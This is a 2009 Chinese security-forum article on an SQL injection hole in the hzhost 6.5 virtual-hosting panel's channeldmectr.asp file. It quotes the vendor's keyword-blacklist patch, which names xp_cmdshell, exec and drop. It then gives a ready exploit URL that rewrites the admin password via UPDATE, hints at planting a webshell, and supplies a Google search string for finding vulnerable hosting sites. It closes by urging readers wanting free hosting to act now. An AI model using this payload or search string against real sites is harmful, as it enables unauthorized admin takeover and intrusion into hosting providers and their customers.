首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
hzhost6.5虚拟主机管理系统最新SQL漏洞(附漏洞补丁)
来源:www.hacksb.cn 作者:普瑞斯特 发布时间:2009-04-14  

文章来源:普瑞斯特

其实呢,漏洞一点都不新,在t00ls都躺了N天了,就是不见有人转出来..
没记错的话这已经是华众第四次出漏洞了..而且每次犯的还都是一个毛病,
我很看好他们的程序员.
这次漏洞出在channeldmectr.asp这个文件上,跟本就没有过滤任何参数.
正好我这里有正版的补丁,打开看下了,打上补丁的channeldmectr.asp文件在第21行到第40行,增加了以下代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
Function SafeRequest(ParaName)
Dim ParaValue
ParaValue=Request(ParaName)
if IsNumeric(ParaValue) then
SafeRequest=ParaValue
exit Function
else
ParaValuetemp=lcase(ParaValue)
tempvalue="<span style="color: #ff0000;">select|insert|delete|union|
join|script|applet|object|'|drop|update|truncate|
create|xp_cmdshell|exec|alter|cast|rename|modify</span>"
temps=split(tempvalue,"|")
for mycount=0 to ubound(temps)
if Instr(ParaValuetemp,temps(mycount)) &gt; 0 and lcase(ParaName)&lt;&gt;"module" then
call errorpage(-2,"您提交的内容包含了字符["&amp;temps(mycount)&amp;"],请去除后重新提交或联系我们…")
response.end
end if
next
SafeRequest=ParaValue
end if
End function

代码的大概意思是对其中红色部分的参数进行过滤,禁止提交,防止执行构造好的SQL语句.
利用方法如下:
http://www.xxx.com/incs/channeldmectr.asp?domainname=1′);{我们构造的语句}–
下面给出一个示范语句:
http://www.xxx.com/incs/channeldmectr.asp?domainname=1′);UPDATE [memlst] SET u_pss=’e10adc3949ba59abbe56e057f20f883e’ WHERE u_nme=’admin’–
语句的意思是将管理员账号admin的密码改为123456.
当然大家也可以灵活运用,构造其他语句,比如写一句话马进去之类的,这里省略.
最后丢个关键词给大家,Google搜索inurl:pdtshw/hstshw会出来大批的使用华众平台的IDC站点..
我这个人比较善良,放出独家收藏华众近期出现的所有漏洞的补丁,有需要的朋友可以下载.
OK,就介绍到这里,想拿免费空间的淫们现在也可以行动了..
Patch下载


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·尘月网络企业网站智能管理系统漏
·server limit dos
·Google Chrome使用ajax读取本地
·Discuz!论坛wap功能模块编码的注
·2009-4 应用安全漏洞 选录
·浅析LxBlog V6变量未初始化漏洞
·魅力企业网站管理系统 2009 SP3
·phpcms2008-0day ask/search_aja
·Bo-Blog 2.0.3 注射漏洞
·php mail function open_basedir
·php pear mail包任意文件读写漏
·远古视频点播系统的一个注入漏洞
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved